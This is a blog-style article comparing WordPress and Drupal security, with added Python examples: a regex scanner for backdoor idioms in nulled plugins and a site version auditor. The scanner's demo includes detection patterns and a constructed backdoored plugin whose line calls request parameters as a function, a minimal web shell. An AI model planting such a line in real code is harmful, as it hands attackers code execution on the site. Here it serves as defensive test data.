Drupal is widely regarded as a secure content management system, so much so that it is often chosen for sensitive sites, including the sites of many government agencies. WordPress’s reputation for security is not quite as impressive, and we’re all familiar with stories of hacked WordPress sites.
Does that mean it’s fair to say that WordPress is less secure than Drupal?
This is not a simple question to answer because it depends on our answers to other questions: What do we mean by secure? How do we measure security? It certainly wouldn’t be fair to compare media stories about WordPress security with Drupal’s record. There are vastly more WordPress sites than Drupal sites, so a raw count of hacked sites will always skew against WordPress regardless of how secure either application is.
One possible definition of a secure Content Management System (CMS) is one that is extremely unlikely to be compromised if it is configured according to the documentation and regularly updated. If we accept that definition, then both WordPress and Drupal are secure. No application on the web is ever totally secure, but properly configured and regularly updated Drupal and WordPress sites are unlikely to be compromised.
What Are the Qualities of a Secure CMS?
There are many ways to measure the security of an application, but from the perspective of users, three factors are particularly important.
- Few vulnerabilities. Software bugs that cause exploitable vulnerabilities should not be a regular occurrence. They’ll sometimes happen because software is complex and humans are fallible, but users should not expect to see their sites regularly hacked because of vulnerabilities in the core application.
- Vulnerabilities are quickly fixed. When vulnerabilities are reported to the developers, patches to fix them should be released quickly, and users should be informed of the need to update (or updates should happen automatically).
- Easy to secure. If a content management system is generally used by people without a lot of technical knowledge, then it should be designed to minimize opportunities for users to create security problems. For example, it shouldn’t be easy for people to use a default password instead of a secure password.
It’s easier to compare Drupal and WordPress on some of these measures than others. We can count the critical vulnerabilities found and fixed in each project, because both publish security advisories and release notes. We can’t see vulnerabilities that haven’t been discovered or reported, and a flaw that attackers are exploiting before a patch exists (a zero-day) won’t appear in the count until it is disclosed, but the record of reported vulnerabilities is a useful proxy for overall risk.
It’s clear that both projects have their share of vulnerabilities, but we can also see that patches are released quickly. Both projects take security seriously and react with haste when vulnerabilities are reported.
Security Beyond the Core
What about WordPress plugins and Drupal modules? When a WordPress site is hacked, the entry point is usually a plugin (or theme) rather than core. The official directory alone holds some 50,000 plugins, created by developers of mixed ability who are not equally motivated to secure their code. Drupal too has occasional security issues in contributed modules, but the Drupal module ecosystem is smaller and more tightly controlled, and drupal.org indicates which projects are covered by the Drupal Security Team’s advisory policy.
There are many high-quality WordPress plugins made by developers who are committed to building secure products, but the sheer size of the WordPress ecosystem means that the average WordPress plugin is more likely to pose a risk than the average Drupal module.
For both content management systems, and WordPress in particular, it pays to be cautious when sourcing and installing modules or plugins: install from the official directory or a vendor you trust, and check when the code was last updated and whether the maintainer responds to security reports. Nulled plugins (pirated premium plugins) are a particular problem in the WordPress world. They are often backdoored, and because a plugin runs with the full privileges of the site’s PHP process, installing a backdoored one hands the attacker code execution on your site.
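As an added example (not part of the original article, and not a tool from either project), here is a small Python scan over a plugins directory for obfuscation and backdoor idioms commonly seen in nulled plugins. The indicator patterns, the two plugin files and their contents are all constructed for the demonstration; a real backdoor may use none of these, so treat a hit as something to read and a clean result as no guarantee.

```python
import re
import tempfile
from pathlib import Path

# Constructed indicator set: common obfuscation and backdoor idioms, not an
# exhaustive signature database. Each regex is applied to one source line.
INDICATORS = {
    "eval_of_decoded_payload": re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "request_parameter_called_as_function": re.compile(
        r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\("),
    "long_base64_literal": re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]"),
    "hex_escaped_string": re.compile(r"(?:\\x[0-9a-fA-F]{2}){6,}"),
    "remote_include": re.compile(
        r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]https?://", re.I),
}


def scan_source(text):
    """Return [(indicator_name, line_number), ...] for one PHP source string."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.append((name, lineno))
    return hits


def scan_plugin_dir(root):
    """Walk a plugins directory; return {relative_path: hits} for files with hits."""
    root = Path(root)
    findings = {}
    for path in sorted(root.rglob("*.php")):
        hits = scan_source(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings


# Constructed sample plugins: one ordinary, one carrying a typical backdoor
# (the base64 literal below just decodes to the words "payload omitted").
CLEAN_PLUGIN = """<?php
/*
Plugin Name: Example Gallery
Version: 1.4.2
*/
function example_gallery_shortcode($atts) {
    $atts = shortcode_atts(array('count' => 5), $atts);
    return '<div class="gallery">' . intval($atts['count']) . '</div>';
}
add_shortcode('example_gallery', 'example_gallery_shortcode');
"""

BACKDOORED_PLUGIN = """<?php
/*
Plugin Name: Premium Slider (nulled)
Version: 3.0.1
*/
function premium_slider_init() { /* legitimate-looking code */ }
add_action('init', 'premium_slider_init');
if (isset($_REQUEST['p'])) { $_REQUEST['p']($_REQUEST['c']); }
eval(base64_decode('cGF5bG9hZCBvbWl0dGVk'));
"""


def demo():
    """Write both constructed plugins into a temporary tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for slug, source in (("example-gallery", CLEAN_PLUGIN),
                             ("premium-slider", BACKDOORED_PLUGIN)):
            (root / slug).mkdir()
            (root / slug / f"{slug}.php").write_text(source, encoding="utf-8")
        return scan_plugin_dir(root)


if __name__ == "__main__":
    for path, hits in demo().items():
        for name, lineno in hits:
            print(f"{path}:{lineno}: {name}")
```

Point `scan_plugin_dir` at a real `wp-content/plugins` directory to use it outside the demo. The line-by-line approach is deliberate: it keeps each hit attributable to a line you can open and read, which matters more than catching every variant, and it is why the patterns stay simple rather than trying to parse PHP.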
Developers Can Only Do So Much
Now we come to the most significant cause of security vulnerabilities for any content management system: its users. As we’ve established, every CMS has vulnerabilities that can be exploited by hackers at some point in its life. Those vulnerabilities are usually quickly fixed, but the fixes are useless if they aren’t installed. WordPress users who fail to update WordPress and its plugins are probably the single biggest cause of compromised sites. Outdated sites are also a big problem in the Drupal world, albeit on a smaller scale.
WordPress attracts many non-technical users; Drupal is aimed squarely at developers and organizations with the expertise to maintain a more complex content management system. Because Drupal assumes its users have at least some technical knowledge, it does less than WordPress to make secure operation easy for non-experts.
Updating Drupal core and its modules (typically through Composer, followed by running the pending database updates) is more work than WordPress’s automatic minor-version updates, but if you know what you’re doing it is not prohibitively difficult.
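Since an unapplied fix is no fix, the first maintenance question is simply what is installed and how far behind it is. As an added example, not code from either project, the following Python script inventories a site and flags outdated components. It reads the core version from `wp-includes/version.php` and plugin versions from the plugin header comment (both real WordPress conventions), and the Drupal core version from `composer.lock`. The "latest known" table and the site trees are constructed so it runs offline; in practice you would fill the table from the WordPress.org version-check and plugin APIs, or from `composer outdated` for Drupal.

```python
import json
import re
import tempfile
from pathlib import Path

# Constructed "latest known" table, embedded so the audit runs offline.
# Populate it from the WordPress.org APIs or `composer outdated` in real use.
LATEST = {
    "wordpress/core": "6.4.3",
    "wordpress/plugin/example-gallery": "1.5.0",
    "wordpress/plugin/contact-form-lite": "2.2.0",
    "drupal/core": "10.2.3",
}

def parse_version(v):
    """'6.4.1' -> (6, 4, 1); a non-numeric component counts as 0."""
    parts = []
    for piece in v.strip().split("."):
        m = re.match(r"\d+", piece)
        parts.append(int(m.group()) if m else 0)
    return tuple(parts)

def is_outdated(installed, latest):
    return parse_version(installed) < parse_version(latest)

def wp_core_version(wp_root):
    """Read $wp_version from wp-includes/version.php (real WordPress layout)."""
    text = (Path(wp_root) / "wp-includes" / "version.php").read_text()
    m = re.search(r"\$wp_version\s*=\s*['\"]([^'\"]+)['\"]", text)
    return m.group(1) if m else None

def wp_plugin_versions(wp_root):
    """Return {slug: version} from the 'Version:' header of each plugin's main file."""
    found = {}
    plugins = Path(wp_root) / "wp-content" / "plugins"
    if not plugins.is_dir():
        return found
    for plugin_dir in sorted(p for p in plugins.iterdir() if p.is_dir()):
        for php in sorted(plugin_dir.glob("*.php")):
            head = php.read_text(errors="replace")[:8192]  # header block sits at the top
            if "Plugin Name:" not in head:
                continue
            m = re.search(r"^\s*\*?\s*Version:\s*(\S+)", head, re.M)
            if m:
                found[plugin_dir.name] = m.group(1)
            break
    return found

def drupal_core_version(site_root):
    """Read the installed drupal/core version from composer.lock."""
    lock = json.loads((Path(site_root) / "composer.lock").read_text())
    for pkg in lock.get("packages", []):
        if pkg.get("name") == "drupal/core":
            return pkg.get("version")
    return None

def audit(wp_root=None, drupal_root=None):
    """Return [(component, installed, latest), ...] for every outdated component."""
    report = []
    if wp_root is not None:
        core = wp_core_version(wp_root)
        if core and is_outdated(core, LATEST["wordpress/core"]):
            report.append(("wordpress/core", core, LATEST["wordpress/core"]))
        for slug, ver in wp_plugin_versions(wp_root).items():
            key = f"wordpress/plugin/{slug}"
            if key in LATEST and is_outdated(ver, LATEST[key]):
                report.append((key, ver, LATEST[key]))
    if drupal_root is not None:
        core = drupal_core_version(drupal_root)
        if core and is_outdated(core, LATEST["drupal/core"]):
            report.append(("drupal/core", core, LATEST["drupal/core"]))
    return report

def demo():
    """Build constructed WordPress and Drupal trees in a temp dir and audit them."""
    with tempfile.TemporaryDirectory() as tmp:
        wp = Path(tmp) / "wordpress"
        (wp / "wp-includes").mkdir(parents=True)
        (wp / "wp-includes" / "version.php").write_text("<?php\n$wp_version = '6.4.1';\n")
        for slug, ver in (("example-gallery", "1.4.2"), ("contact-form-lite", "2.2.0")):
            plugin_dir = wp / "wp-content" / "plugins" / slug
            plugin_dir.mkdir(parents=True)
            (plugin_dir / f"{slug}.php").write_text(
                f"<?php\n/*\nPlugin Name: {slug}\nVersion: {ver}\n*/\n")
        drupal = Path(tmp) / "drupal"
        drupal.mkdir()
        (drupal / "composer.lock").write_text(json.dumps(
            {"packages": [{"name": "drupal/core", "version": "10.1.8"}]}))
        return audit(wp_root=wp, drupal_root=drupal)

if __name__ == "__main__":
    for component, installed, latest in demo():
        print(f"OUTDATED {component}: {installed} -> {latest}")
```

A plugin absent from the table is reported as nothing, which is the honest answer rather than a false "up to date"; extend the table (or the lookup) before trusting a quiet run on a real site.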
Drupal or WordPress?
The truth is that both Drupal and WordPress are secure if properly installed, configured, and maintained. The opposite is also true; a poorly maintained Drupal or WordPress site is a gift to hackers.
Drupal has fewer issues with module vulnerabilities, but if a Drupal site is left without updates for a couple of years, it’ll be hacked as quickly as an unpatched WordPress site. Moreover, because Drupal is more complex and more challenging to update, a non-technical user may struggle to maintain adequate security.
If you don’t need the power and flexibility of Drupal, then a well-maintained WordPress site is the best option — just remember to keep the site and its plugins updated.
If you do need Drupal’s flexibility, then the fact that expert developers choose Drupal for highly sensitive government and corporate sites should reassure you that Drupal can be secured to the highest level.
It’s important to understand that security goes deeper than whichever CMS you choose. Both Drupal and WordPress rely on utility software, a database, a web server, an operating system, and more.
These must all be maintained and updated too. On managed hosting that is the hosting provider’s job; on a VPS or dedicated server it is yours.
The first step in securing your content management system is with secure hosting.